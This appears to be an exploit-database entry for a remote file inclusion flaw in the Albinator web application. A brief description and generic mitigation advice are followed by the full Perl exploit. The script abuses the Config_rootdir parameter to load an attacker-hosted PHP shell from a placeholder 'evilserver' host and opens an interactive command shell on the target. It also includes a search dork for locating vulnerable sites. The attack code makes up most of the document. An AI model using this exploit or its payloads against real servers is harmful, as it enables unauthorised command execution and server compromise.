Albinator Multiple Parameter File Inclusion

vendor:

Albinator

by:

VietMafia and r0t, webDEViL w3bd3vil[at]gmail.com

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Albinator

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Windows, Mac

Unknown

Albinator Multiple Parameter File Inclusion

Albinator Multiple Parameter File Inclusion is a vulnerability that allows an attacker to include a remote file on the web server. This vulnerability was discovered by VietMafia and r0t and was exploited by webDEViL w3bd3vil[at]gmail.com. The exploit uses a perl script to send a GET request to the vulnerable server with the path to the remote file and the command variable used in the php shell. The attacker can then execute arbitrary commands on the server.

Mitigation:

To mitigate this vulnerability, the web server should be configured to only allow access to trusted files and directories. Additionally, the web server should be configured to only allow access to files with specific extensions.

Source

Exploit-DB raw data:

#!/usr/bin/perl
##
#Albinator Multiple Parameter File Inclusion 
# Bug discovered by VietMafia and r0t
# code copier: webDEViL w3bd3vil[at]gmail.com
#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
#Dork:"powered by Albinator "
# usage:
# perl wb.pl <target> <cmd shell location> <cmd shell variable>
# perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd
# cmd shell example: <?system($cmd);?>
# cmd shell variable: ($_GET[cmd]);

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
      print "[shell] \$";
while(<STDIN>)
      {
              $cmd=$_;
              chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'eshow.php?Config_rootdir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; 
## can change eshow.php to eday.php or forgot.php

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
      {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)

{
      $finreturn = $1;
      $finreturn=~ tr/[ê]/[\n]/;
      print "\r\n$finreturn\n\r";
      last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print "\n============================================================================\r\n";
 print " Albinator Multiple Parameter File Inclusion\r\n";
 print "============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl wb.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
 print " <Site> - Full path to Albinator ex: http://www.site.com/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "============================================================================\r\n";
 print "                          webDEViL w3bd3vil[at]gmail.com \r\n";
 print "============================================================================\r\n";
 exit();
 }

# milw0rm.com [2006-05-03]